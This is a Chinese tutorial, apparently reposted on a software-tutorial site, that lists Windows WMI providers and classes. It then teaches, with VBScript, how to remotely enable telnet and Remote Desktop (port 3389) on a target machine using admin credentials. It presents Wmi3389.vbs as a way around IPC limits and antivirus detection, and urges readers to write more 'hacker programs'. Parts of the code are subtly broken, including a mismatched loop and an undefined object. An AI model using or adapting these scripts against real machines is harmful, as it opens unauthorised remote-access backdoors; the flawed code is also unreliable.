明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

WMI 程序清單 WMI 提供程序清單

發(fā)表時(shí)間:2023-09-13 來(lái)源:明輝站整理相關(guān)軟件相關(guān)文章人氣:

[摘要]WMI 程序清單 WMI 提供程序清單 表 1:部分標(biāo)準(zhǔn)的 WMI 提供程序清單提供程序DLL命名空間說(shuō)明Active Directory 提供程序dsprov.dllroot\directory\ldap將 Active Directory 對(duì)象映射到 WMI。事件日志提供程序ntevt.dll...

WMI 程序清單 WMI 提供程序清單

 

 1:部分標(biāo)準(zhǔn)的 WMI 提供程序清單
提供程序
DLL
命名空間
說(shuō)明
Active Directory 提供程序
dsprov.dll
root\directory\ldap
 Active Directory 對(duì)象映射到 WMI。
事件日志提供程序
ntevt.dll
root\cimv2
管理 Windows 事件日志,例如,讀取、備份、清除、復(fù)制、刪除、監(jiān)視、重命名、壓縮、解壓縮和更改事件日志設(shè)置。
性能計(jì)數(shù)器提供程序
wbemperf.dll
root\cimv2
提供對(duì)原始性能數(shù)據(jù)的訪問(wèn)。
注冊(cè)表提供程序
stdprov.dll
root\default
讀取、寫入、枚舉、監(jiān)視、創(chuàng)建、刪除注冊(cè)表項(xiàng)和值。
SNMP 提供程序
snmpincl.dll
root\snmp
提供對(duì) SNMP MIB 數(shù)據(jù)的訪問(wèn),并從 SNMP 托管設(shè)備捕獲。
WDM 提供程序
wmiprov.dll
root\wmi
提供對(duì) WDM 設(shè)備驅(qū)動(dòng)程序中信息的訪問(wèn)。
Win32 提供程序
cimwin32.dll
root\cimv2
提供關(guān)于計(jì)算機(jī)、磁盤、外圍設(shè)備、文件、文件夾、文件系統(tǒng)、網(wǎng)絡(luò)組件、操作系統(tǒng)、打印機(jī)、進(jìn)程、安全性、服務(wù)、共享、SAM 用戶及組,以及更多資源的信息。
Windows 安裝程序提供程序
msiprov.dll
root\cimv2
提供對(duì)已安裝軟件信息的訪問(wèn)。

 

 
一:WMI基礎(chǔ)知識(shí) 
==================================================================================== 
WMI 最初于1998年作為一個(gè)附加組件與 Windows NT 4.0 Service Pack 4 一起發(fā)行,是內(nèi)置在Windows 2000、 Windows XPWindows Server 2003 系列操作系統(tǒng)中核心的管理支持技術(shù);谟 Distributed Management Task Force (DMTF) 所監(jiān)督的業(yè)界標(biāo)準(zhǔn),WMI是一種規(guī)范和基礎(chǔ)結(jié)構(gòu),通過(guò)它可以訪問(wèn)、配置、管理和監(jiān)視幾乎所有的Windows資源。大多用戶習(xí)慣于使用眾多的圖形化管理工具來(lái)管理Windows資源,在WMI之前這些工具都是通過(guò) Win32應(yīng)用程序編程接口(Application ProgrammingInterfaces,API)來(lái)訪問(wèn)和管理Windows資源的。只要你熟悉系統(tǒng)編程你就知道API有多么重要。但是大多數(shù)腳本語(yǔ)言都不能直接調(diào)用Win32 APIWMI的出現(xiàn)使得系統(tǒng)管理員可以通過(guò)一種簡(jiǎn)便的方法即利用常見的腳本語(yǔ)言實(shí)現(xiàn)常用的系統(tǒng)管理任務(wù)。 
利用WMI需要和腳本如WSHVBScript結(jié)合起來(lái),可以實(shí)現(xiàn)的功能大家可以看微軟的MSDN文檔。 
在編寫我們自己的腳本之前,我們需要對(duì)WMI的體系結(jié)構(gòu)有個(gè)基本的了解。如圖一:(1.gif) 
WMI 體系結(jié)構(gòu)中我們最需要關(guān)心的就是WMI提供程序,WMI提供程序在WMI和托管資源之間扮演著中間方的角色。提供程序代表使用者應(yīng)用程序和腳本從WMI托管資源請(qǐng)求信息,并發(fā)送指令到WMI托管資源。下面是我們利用WMI編程經(jīng)常要用到的WMI內(nèi)置提供程序清單,以供編程參考。 
1.Active Directory提供程序 
鏈接庫(kù)文件:dsprov.dll 
命名空間:root\directory\ldap 
作用:將Active Directory 對(duì)象映射到 WMI。 

2.事件日志提供程序 
鏈接庫(kù)文件:ntevt.dll 
命名空間:root\cimv2 
作用:管理 Windows 事件日志,例如,讀取、備份、清除、復(fù)制、刪除、監(jiān)視、重命名、壓縮、解壓縮和更改事件日志設(shè)置。 

3.注冊(cè)表提供程序 
鏈接庫(kù)文件:stdprov.dll 
命名空間:root\default 
作用:讀取、寫入、枚舉、監(jiān)視、創(chuàng)建、刪除注冊(cè)表項(xiàng)和值。 

4.Win32 提供程序 
鏈接庫(kù)文件:cimwin32.dll 
命名空間:root\cimv2 
作用:提供關(guān)于計(jì)算機(jī)、磁盤、外圍設(shè)備、文件、文件夾、文件系統(tǒng)、網(wǎng)絡(luò)組件、操作系統(tǒng)、打印機(jī)、進(jìn)程、安全性、服務(wù)、共享、SAM 用戶及組,以及更多資源的信息。 

5.Windows 安裝程序提供程序 
鏈接庫(kù)文件:msiprov.dll 
命名空間:root\cimv2 
作用:提供對(duì)已安裝軟件信息的訪問(wèn)。 

從上面可以看出在WMI中類(即內(nèi)置提供程序)被分組到命名空間中,命名空間可以看成是一個(gè)組。比如,命名空間 root\cimv2 包括大部分表示通常與計(jì)算機(jī)和操作系統(tǒng)相關(guān)聯(lián)的資源的類。在使用類的時(shí)候要說(shuō)明類所在的命名空間。類由屬性和方法構(gòu)成。這是可視化編程中的兩個(gè)重要的概念。屬性描述的是對(duì)象的狀態(tài),方法是對(duì)象可以執(zhí)行的操作。 
理論知識(shí)學(xué)起來(lái)很枯燥,下面讓我們邊分析高手的腳本源碼邊進(jìn)行理論知識(shí)的鞏固吧。 

二:解析RTCS.VBS主要代碼 
===================================================================================== 
有時(shí)候閱讀別人的源碼未嘗不是一個(gè)好而且快捷的辦法,下面就讓我們來(lái)認(rèn)真學(xué)習(xí)zzzEVAzzz編寫的一個(gè)可以遠(yuǎn)程開啟telnet服務(wù)的腳本RTCS.VBS。 
該腳本可以直接訪問(wèn)目標(biāo)的WMI,不依賴于目標(biāo)的ipc$,實(shí)現(xiàn)遠(yuǎn)程開啟/關(guān)閉目標(biāo)telnet服務(wù),為了方便大家學(xué)習(xí)我抽出了最主要的代碼,具體分析如下: 
set objlocator=createobject("wbemscripting.swbemlocator") 
//創(chuàng)建WbemScripting.SwbemLocator對(duì)象(腳本接口) 
//可以看出WMI其實(shí)就是把Com組件WbemScripting.SWbemLocator封裝起來(lái)罷了。 
set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password) 
//通過(guò)ConnectServer函數(shù)請(qǐng)求連接到WMI控件服務(wù)上,root/default為命名空間。 
set objinstance=objswbemservices.get("stdregprov") 
//建立訪問(wèn)注冊(cè)表的實(shí)例。 
set objmethod=objinstance.methods_("SetDWORDvalue") 
//建立可以更改注冊(cè)表鍵值的方法。 
set objinparam=objmethod.inparameters.spawninstance_() 
//MethodData.InParameters用于獲取或設(shè)置方法的輸入?yún)?shù)。這里用spawninstance方法為它建立一個(gè)子實(shí)例,下面就可以將參數(shù)值賦予這個(gè)對(duì)象的屬性。 
objinparam.hdefkey=&h80000002 
//hdefkey表示根鍵,根鍵的十六制值如下: 
//HKEY_CLASSES_ROOT (&H80000000) 
//HKEY_CURRENT_USER (&H80000001) 
//HKEY_LOCAL_MACHINE (&H80000002) 
//HKEY_USERS (&H80000003) 
//HKEY_CURRENT_CONFIG (&H80000005) 
objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer\1.0" 
//ssubkeyname表示子鍵。 
objinparam.svaluename="NTLM" 
//svaluename表示屬性名。 
objinparam.uvalue=ntlm 
//uvalue表示鍵值。 
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam) 
//利用execmethod執(zhí)行方法,這里才真正改寫了注冊(cè)表。 

//下面是修改telnet服務(wù)的TelnetPort值,原理同上。 
objinparam.svaluename="TelnetPort" 
objinparam.uvalue=port 
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam) 

修改telnet的注冊(cè)表部分就完成了,將NTLMTelnetPort進(jìn)行了修改,要是對(duì)方的telnet服務(wù)沒(méi)有開啟呢?下面就需要根據(jù)telnet的具體情況,來(lái)啟動(dòng)telnet服務(wù),繼續(xù)看代碼。 

//首先查詢遠(yuǎn)程主機(jī)上tlntsvr的啟動(dòng)方式。 
set objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password) 
//win32_service類在root\cimv2命名空間中,作用沒(méi)忘記吧?快看基礎(chǔ)知識(shí)呵。 
set colinstances=objswbemservices.execquery("select * from win32_service where name='tlntsvr'") 
//注意:查詢都是通過(guò)枚舉來(lái)實(shí)現(xiàn)的。 
for each objinstance in colinstances 
if objinstance.startmode="Disabled" then 
set objmethod=objinstance.methods_("changestartmode") 
//創(chuàng)建changestartmode方法來(lái)改變tlntsvr的啟動(dòng)方式。 
set objinparam=objmethod.inparameters.spawninstance_() 
objinparam.startmode="Manual" 
//將啟動(dòng)方式改為手動(dòng)方式。 
set objoutparam=objinstance.execmethod_("changestartmode",objinparam) 
end if 

//下面啟動(dòng)我們的telnet服務(wù)。這里zzzEVAzzz的思路好象有點(diǎn)不對(duì),也不知道是不是他的疏忽,我個(gè)人認(rèn)為當(dāng)telnet服務(wù)已經(jīng)啟動(dòng)時(shí)不應(yīng)該用stopservice方法停止服務(wù)。 
if objinstance.started=true then 
intstatus=objinstance.stopservice() 
//stopserviceWMI中用于停止服務(wù)實(shí)例的服務(wù)的方法。 
else 
intstatus=objinstance.startservice() 
end if 
next 

三:手把手教你編寫WMI版本的ROTS.vbs來(lái)開啟3389 
===================================================================================== 
zzzVEAzzz 的腳本就分析到這里吧,怎么樣?很EASY吧?!我相信大家現(xiàn)在一定蠢蠢欲動(dòng)了?:)好,一起來(lái)寫一個(gè)什么程序呢?ROTS.vbs我想大家一定都用過(guò)吧?什么東東?我……!大家應(yīng)該知道這個(gè)ROTS是有它的使用條件的,不僅要有管理員帳號(hào),還要允許進(jìn)行ipc連接,在這個(gè)到處都是墻的年代,ipc 早就不實(shí)用了,而且ROTS.vbs早就被查殺了,那該怎么辦?當(dāng)然是自己動(dòng)手了。能不能實(shí)現(xiàn)ROTS的一樣的遠(yuǎn)程開啟3389的功能而不受ipc的限制呢?答案自從我寫了這篇文章后成為肯定的,哈哈,吹吹了。 
當(dāng)然我們也是要求系統(tǒng)至少是2000server及以上的,最近看到有個(gè)軟件可以給2000pro3389,由于比較忙,也沒(méi)怎么去理它,這里我們暫且不說(shuō)它,知道了原理一樣好辦。 
開啟3389有個(gè)注冊(cè)表導(dǎo)入的方法,其它一些軟件的開法,我想也大多是通過(guò)修改注冊(cè)表實(shí)現(xiàn)的。這個(gè)方法需要導(dǎo)入如下的注冊(cè)表: 
Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] 
"Enabled"="0" 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 
"ShutdownWithoutLogon"="0" 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] 
"EnableAdminTSRemote"=dword:00000001 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] 
"TSEnabled"=dword:00000001 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] 
"Start"=dword:00000002 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] 
"Start"=dword:00000002 
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] 
"Hotkey"="1" 

原理知道了就沒(méi)什么難的了,先理清我們的思路,我們的主要任務(wù)是更改注冊(cè)表里的鍵值。首先是創(chuàng)建WMI對(duì)象,然后是連接到遠(yuǎn)程WMI服務(wù)器,最后修改注冊(cè)表鍵值。 
部分主要代碼如下(完整的代碼和詳細(xì)的注釋請(qǐng)看附帶的軟件包) 

on error resume next 
//防止出現(xiàn)意外。 
set outstreem=wscript.stdout 
if (lcase(right(wscript.fullname,11))="wscript.exe") then 
set objShell=wscript.createObject("wscript.shell") 
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34)) 
//cmd后帶/K參數(shù)表示執(zhí)行字符串指定的命令。 
wscript.quit 
end if 
//進(jìn)行簡(jiǎn)單的檢查。 
if wscript.arguments.count<3 then 
usage() 
wscript.echo "Not enough parameters." 
wscript.quit 
end if 
//取出參數(shù),分別賦予幾個(gè)變量。 
ipaddress=wscript.arguments(0) 
username=wscript.arguments(1) 
password=wscript.arguments(2) 
option=wscript.arguments(3) 
usage() 

下面是核心代碼,也是實(shí)現(xiàn)遠(yuǎn)程修改注冊(cè)表的功能,我這里給出另外一種實(shí)現(xiàn)的方式,對(duì)照前面的代碼很容易理解,我就只作簡(jiǎn)單的解釋了。詳細(xì)情況可以參閱MSDN文檔中關(guān)于StdRegProv類的說(shuō)明。 
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/wmisdk/wmi/stdregprov.asp 

const HKEY_LOCAL_MACHINE = &H80000002 
const HKEY_USERS=&H80000003 
strComputer = ipaddress 

//獲取wmi對(duì)象 
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ 
strComputer & "\root\default:StdRegProv") 

strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\netcache" 
strValueName = "Enabled" 
strValue=0 
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 

strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 
strValueName = "ShutdownWithoutLogon" 
strValue=0 
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 

strKeyPath = "SOFTWARE\Policies\Microsoft\Windows\Installer" 
strValueName = "EnableAdminTSRemote" 
strValue=1 
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" 
strValueName = "TSEnabled" 
strValue=1 
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 

strKeyPath = "SYSTEM\CurrentControlSet\Services\TermDD" 
strValueName = "Start" 
strValue=2 
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 

strKeyPath = "SYSTEM\CurrentControlSet\Services\TermService" 
strValueName = "Start" 
strValue=2 
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue 

strKeyPath = ".DEFAULT\Keyboard Layout\Toggle" 
strValueName = "Hotkey" 
strValue=1 
oReg.SetDWORDValue HKEY_USERS,strKeyPath,strValueName,strValue 

//下面實(shí)現(xiàn)重啟遠(yuǎn)程機(jī)器 
if option="/r" then 
outstreem.write "Now, rebooting target...." 
strwmiquery="select * from win32_operatingsystem where primary='true'" 
set colinstances=objswbemservices.execquery(strwmiquery) 
for each objinstance in colinstances 
objinstance.win32shutdown(2) 
end if 
outstreem.write "Ok, rebooted the target." 

//簡(jiǎn)單的用法說(shuō)明的函數(shù)。 
function usage() 
wscript.echo string(60,"=") 
wscript.echo "Wmi3389 v1.0.0" 
wscript.echo "No ipc Open 3389, code written by pye." 
wscript.echo "Welcome to visite www.coon.cn or Mail to grandh4408@yahoo.com.cn" 
wscript.echo "Usage:" 
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [/r]" 
wscript.echo "/r reboot the target this is optional" 
wscript.echo "It use WMI to Open 3389 of target server." 
wscript.echo string(60,"=")&vbcrlf 
end function 
將上面的代碼復(fù)制帶記事本里,保存為Wmi3389.vbs。然后在CMD里執(zhí)行: 
cscript Wmi3389.vbs ipaddress administrator password [/r] 
看看是不是和ROTS.vbs有一樣的效果?大家趕快實(shí)踐實(shí)踐吧。 

四:最后的嘮叨 
===================================================================================== 
大家可以看出WMI的功能是很強(qiáng)大的,這里要感謝MicroSoft了,它是永遠(yuǎn)都不會(huì)讓我們失望的。WMI對(duì)象允許通過(guò)VBVBAWSH, VBScript JScript,ASP,或是支持自動(dòng)對(duì)象的其它環(huán)境,對(duì)WMI進(jìn)行完全訪問(wèn)。在參考查詢體系中加入 WMI Scripting V1.1 Library ,則Visual Basic或是VBA方案就可以訪問(wèn)這些對(duì)象了。支持ActiveX程序的操作平臺(tái)可以通過(guò)對(duì)象類的代號(hào),或是類的名稱創(chuàng)建這些對(duì)象,這些對(duì)象的前綴是WbemScripting,如 WbemScripting.SwbemLocator。所以大家有興趣的完全可以利用VB,WSHVBScript, JScriptASP等編寫更多的利用WMI的黑客程序。 


---------------------------------------------------- 
最后給你附上一段程序 
/* ********************************************** 
* Rainsoft Development Library for Microsoft.NET 

* Copyright (c) 2004,2005 RainTrail Studio.China 
* All Rigths Reserved! 
* Author: Q.yuhen (qyuhen@hotmail.com) 
********************************************** */ 
using System; 
using System.Management; 
using System.Collections; 
using System.Collections.Specialized; 
using System.Text; 

namespace Rainsoft.Management 

#region WMIPath 
public enum WMIPath 

// 硬件 
Win32_Processor, // CPU 處理器 
Win32_PhysicalMemory, // 物理內(nèi)存條 
Win32_Keyboard, // 鍵盤 
Win32_PointingDevice, // 點(diǎn)輸入設(shè)備,包括鼠標(biāo)。 
Win32_FloppyDrive, // 軟盤驅(qū)動(dòng)器 
Win32_DiskDrive, // 硬盤驅(qū)動(dòng)器 
Win32_CDROMDrive, // 光盤驅(qū)動(dòng)器 
Win32_BaseBoard, // 主板 
Win32_BIOS, // BIOS 芯片 
Win32_ParallelPort, // 并口 
Win32_SerialPort, // 串口 
Win32_SerialPortConfiguration, // 串口配置 
Win32_SoundDevice, // 多媒體設(shè)置,一般指聲卡。 
Win32_SystemSlot, // 主板插槽 (ISA & PCI & AGP) 
Win32_USBController, // USB 控制器 
Win32_NetworkAdapter, // 網(wǎng)絡(luò)適配器 
Win32_NetworkAdapterConfiguration, // 網(wǎng)絡(luò)適配器設(shè)置 
Win32_Printer, // 打印機(jī) 
Win32_PrinterConfiguration, // 打印機(jī)設(shè)置 
Win32_PrintJob, // 打印機(jī)任務(wù) 
Win32_TCPIPPrinterPort, // 打印機(jī)端口 
Win32_POTSModem, // MODEM 
Win32_POTSModemToSerialPort, // MODEM 端口 
Win32_DesktopMonitor, // 顯示器 
Win32_DisplayConfiguration, // 顯卡 
Win32_DisplayControllerConfiguration, // 顯卡設(shè)置 
Win32_VideoController, // 顯卡細(xì)節(jié)。 
Win32_VideoSettings, // 顯卡支持的顯示模式。 

// 操作系統(tǒng) 
Win32_TimeZone, // 時(shí)區(qū) 
Win32_SystemDriver, // 驅(qū)動(dòng)程序 
Win32_DiskPartition, // 磁盤分區(qū) 
Win32_LogicalDisk, // 邏輯磁盤 
Win32_LogicalDiskToPartition, // 邏輯磁盤所在分區(qū)及始末位置。 
Win32_LogicalMemoryConfiguration, // 邏輯內(nèi)存配置 
Win32_PageFile, // 系統(tǒng)頁(yè)文件信息 
Win32_PageFileSetting, // 頁(yè)文件設(shè)置 
Win32_BootConfiguration, // 系統(tǒng)啟動(dòng)配置 
Win32_ComputerSystem, // 計(jì)算機(jī)信息簡(jiǎn)要 
Win32_OperatingSystem, // 操作系統(tǒng)信息 
Win32_StartupCommand, // 系統(tǒng)自動(dòng)啟動(dòng)程序 
Win32_Service, // 系統(tǒng)安裝的服務(wù) 
Win32_Group, // 系統(tǒng)管理組 
Win32_GroupUser, // 系統(tǒng)組帳號(hào) 
Win32_UserAccount, // 用戶帳號(hào) 
Win32_Process, // 系統(tǒng)進(jìn)程 
Win32_Thread, // 系統(tǒng)線程 
Win32_Share, // 共享 
Win32_NetworkClient, // 已安裝的網(wǎng)絡(luò)客戶端 
Win32_NetworkProtocol, // 已安裝的網(wǎng)絡(luò)協(xié)議 
}
 
 
 
 
 
Win32_Processor                        // CPU 處理器
Win32_PhysicalMemory                   // 物理內(nèi)存
Win32_Keyboard                         // 鍵盤
Win32_PointingDevice                   // 點(diǎn)輸入設(shè)備,如鼠標(biāo)
Win32_DiskDrive                        // 硬盤驅(qū)動(dòng)器
Win32_CDROMDrive                       // 光盤驅(qū)動(dòng)器
Win32_BaseBoard                        // 主板
Win32_BIOS                             // BIOS 芯片
Win32_ParallelPort                     // 并口
Win32_SerialPort                       // 串口
Win32_SoundDevice                      // 多媒體設(shè)置
Win32_USBController                    // USB 控制器
Win32_NetworkAdapter                   // 網(wǎng)絡(luò)適配器
Win32_NetworkAdapterConfiguration      // 網(wǎng)絡(luò)適配器設(shè)置
Win32_Printer                          // 打印機(jī)
Win32_PrinterConfiguration             // 打印機(jī)設(shè)置
Win32_PrintJob                         // 打印機(jī)任務(wù)
Win32_TCPIPPrinterPort                 // 打印機(jī)端口
Win32_POTSModem                        // MODEM
Win32_POTSModemToSerialPort            // MODEM 端口
Win32_DesktopMonitor                   // 顯示器
Win32_VideoController                  // 顯卡細(xì)節(jié)。
Win32_VideoSettings                    // 顯卡支持的顯示模式。
Win32_TimeZone                         // 時(shí)區(qū)
Win32_SystemDriver                     // 驅(qū)動(dòng)程序
Win32_DiskPartition                    // 磁盤分區(qū)
Win32_LogicalDisk                      // 邏輯磁盤
Win32_LogicalMemoryConfiguration       // 邏輯內(nèi)存配置
Win32_PageFile                         // 系統(tǒng)頁(yè)文件信息
Win32_PageFileSetting                  // 頁(yè)文件設(shè)置
Win32_BootConfiguration                // 系統(tǒng)啟動(dòng)配置
Win32_OperatingSystem                  // 操作系統(tǒng)信息
Win32_StartupCommand                   // 系統(tǒng)自動(dòng)啟動(dòng)程序
Win32_Service                          // 系統(tǒng)安裝的服務(wù)
Win32_Group                            // 系統(tǒng)管理組
Win32_GroupUser                        // 系統(tǒng)組帳號(hào)
Win32_UserAccount                      // 用戶帳號(hào)
Win32_Process                          // 系統(tǒng)進(jìn)程
Win32_Thread                           // 系統(tǒng)線程
Win32_Share                            // 共享
Win32_NetworkClient                    // 已安裝的網(wǎng)絡(luò)客戶端
Win32_NetworkProtocol                  // 已安裝的網(wǎng)絡(luò)協(xié)議

常見的網(wǎng)絡(luò)操作系統(tǒng)有UNIX、Netware、Windows NT、Linux等,網(wǎng)絡(luò)軟件的漏洞及缺陷被利用,使網(wǎng)絡(luò)遭到入侵和破壞。